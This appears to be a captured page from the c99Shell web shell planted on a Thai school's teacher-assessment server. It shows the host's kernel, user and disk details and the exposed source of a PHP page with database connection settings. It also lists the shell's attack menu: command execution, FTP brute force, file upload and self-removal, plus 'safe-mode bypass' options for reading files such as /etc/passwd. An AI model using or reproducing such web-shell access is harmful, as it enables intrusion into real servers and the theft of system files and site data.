!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess_OLD/teacher/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     startPageAssTeach.php (8.89 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
showHeader();
include_once 
"../link/function.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsOfficerAssess.php";
include_once 
"../class/clsDefineAssessment.php";
include_once 
"../class/clsDoAssessmentTeach.php";
include_once 
"../class/clsAssessForm.php";

sendRequest();

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oOFA = new OfficerAssess($oCA);
$oDA = new DefineAssessment($oCA);
$oDoTe = new DoAssessmentTeach($oCA);
$oAF = new AssessForm($oCA);

$now GetNowDate();
list(
$y$m$d) = split('[-]'$now);
$y=$y+543;
$nowDate=$y."-".$m."-".$d;

if(!
$acadYear)
    
$acadYear $GLOBALS["ACADYEAR"];
if(!
$semester)
    
$semester $GLOBALS["SEMESTER"];

$oSse = new SysSemesterDes($oCR);
$oSse->SearchByKey($semester);
$oSse->GetRecord();

    
$officerCode=$oU->userPsCodeReg;
    
//$oOFA->SearchByOfCode($officerCode);
    
$prsId $oOFA->getPrsIdByOfPrsUsId($officerCode); // edit 26/3/2556

    
$oOFA->SearchByKey($prsId); // edit 6/12/2555 to eregis CI version
    
$oOFA->GetRecord();
    
$oWnerId $oOFA->officerId;

//ค้นหาแบบประเมินที่ได้กำหนดไว้  แบบขึ้นกับอาจารย์ (flag =4)
$HoldFlag4 $oDA->CountDefineidByNowDateFlagAcadSem($nowDate,'4',$acadYear,$semester);
?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css"><table width="740" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td><br><fieldset>    
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>">ประเมินการสอน</font></legend>
      <div align="center"><br>
        <form name="pc" method="post" action="<?php echo $PHP_SELF;?>">
          <table width="670" align="center" border="0" cellpadding="0" cellspacing="1">
            <tr> 
              <td width="668" height="109" align="center"> <table width="569" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>">
                  <tr > 
                    <td height="22" colspan="5">&nbsp;</td>
                  </tr>
                  <tr> 
                    <td width="94" rowspan="4"><strong><font color="<?php echo $GLOBALS['COLOR_FONT_7'];?>" size="2"><img src="../picture/pencil_and_paper.jpg" width="78" height="80" border="0" /></font></strong></td>
                    <td height="10" colspan="4">&nbsp;</td>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>"> 
                    <td width="81" height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>รหัสอาจารย์</b></font></td>
                    <td width="92"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b>&nbsp;<?php echo $oOFA->officerCode;?></font></td>
                    <td width="81" height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>ชื่อ-นามสกุล</b></font></td>
                    <td width="205"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b>&nbsp;<?php echo $oOFA->prefixName.$oOFA->officerName.' '.$oOFA->officerSurname;?></font></td>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>"> 
                    <td height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>ปีการศึกษา</b></font></td>
                    <td height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b>&nbsp;<?php echo $acadYear ?></font></td>
                    <td height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>ภาคการศึกษา</b></font></td>
                    <td height="5"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b>&nbsp;<?php echo $oSse->semesterName;?></font></td>
                  </tr>
                  <tr> 
                    <td height="5" colspan="4"><strong></strong></td>
                  </tr>
                </table></td>
            </tr>
            <tr> 
              <td height="2"></td>
            </tr>
          </table>
          <table width="678" border="0" align="center">
            <tr> 
              <td align="right">&nbsp;</td>
              <td al>&nbsp;</td>
            </tr>
            <tr> 
              <td width="1" align="center">&nbsp;</td>
              <td width="684" al> <table width="667" border="0">
                  <?    /*-----------------------------------------------------------กรณีแบบประเมินพิเศษ--------------------------------------------------------------------------*/ 
                
if($HoldFlag4 0){ ?>
                  <tr valign="bottom"> 
                    <td height="21" colspan="2"><img src="../picture/HoldStd.png" width="16" height="16" border="0">&nbsp;<font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>"><b>รายการแบบประเมิน</b></font> 
                      <? $chTime 1
            } 
?>
                    </td>
                  </tr>
                  <?php

                        $flag_4 
0;
                          
$k=0;
                        
//ค้นหาแบบประเมินที่ได้กำหนดไว้   แบบขึ้นกับอาจารย์ผู้สอน(flag =4)
                        
$oDA->SearchAssidByShow($nowDate,'4',$acadYear,$semester);
                        
//$oDA->SearchByAcadSemFlag($acadYear,$semester,'4');
                        
while($oDA->GetRecord()){
                            
//echo "<br> oDA->defineid = ".$oDA->defineid;

                            //นับเพื่อตรวจสอบสถานะการประเมิน
                            
$chAssTeach  $oDoTe->CountCheckAssessment($oDA->defineid,$oOFA->officerId);
                            
//echo "$oDA->defineid,$oOFA->officerId";
                            //echo "chAssTeach = ".$chAssTeach;

                            
$oAF->SearchByKey($oDA->assid);
                            
$oAF->GetRecord();
                                
                            if((
$k%2) == 0)
                                echo 
'<tr>';
                            else
                                echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                    
?>
                  <tr> 
                    <td width="3%" align = "center" valign="top"><font size="1" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><img src="../picture/linesub.gif" border="0" /></font></td>
                    <td width="97%"><font size="1" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> 
                      <? if($chAssTeach == 0) { ?>
                      <a href = "assessFormTeacher.php?defineid=<? echo $oDA->defineid ?>&assid=<? echo $oDA->assid ?>&officerId=<? echo $oOFA->officerId?>" onclick="return sendRequest(this);" onmouseover="window.status=''; return true;"><? echo $oAF->nameAss ?>&nbsp;&nbsp;(<? echo "<img src=\"../picture/no.gif\"  border =\"0\">  ยังไม่ได้ประเมิน"?>)</a> 
                      <? }else{  ?>
                      <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_5"]; ?>"><? echo $oAF->nameAss ?>&nbsp;&nbsp;(<? echo "<img src=\"../picture/yes.gif\"  border =\"0\"> ประเมินแล้ว"?> 
                      )</font> 
                      <? ?>
                      </font> </td>
                  </tr>
                  <?                $flag_4 1;
    
//                            } // end if check studentYear
    //                        } //end while oHStd
                        
$k++;
                     } 
//end while oDA 

                  
if($HoldFlag4 && $flag_4==0){        ?>
                  <tr> 
                    <td height="22" align="center" valign="top"><font size="1" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><a href="../student/courseReg.php"><img src="../picture/linesub.gif" border="0" /></a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">&nbsp; 
                    <td height="22" align="center" valign="top"><font size="1" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><a href="../student/courseReg.php"><img src="../picture/linesub.gif" border="0" /></a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">&nbsp; 
                      </font></td>
                    <td><font size="1" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><a href="../student/courseReg.php"></a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"> 
                      ** ไม่พบรายการแบบประเมิน **</font></td>
                  </tr>
                  <? ?>

                </table></td>
            </tr>
            <tr> 
              <td colspan="2" align="center">&nbsp;</td>
            </tr>
            <tr> 
              <td colspan="2" align="center">&nbsp;</td>
            </tr>
          </table>
</form>
      </div>
      </fieldset><br>
      <table width="742" border="0">
        <tr> 
          <td width="74" height="27"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><strong>หมายเหตุ 
            : </strong></font></td>
          <td width="658"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">คลิกที่แบบประเมินเพื่อทำการประเมิน 
            </font></td>
        </tr>
      </table>
 </td>
</tr>
</table>
<form name="silent" id="silent" style="margin:0px; padding: 0px;" method="post"></form>
<?php
showFooter
();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0095 ]--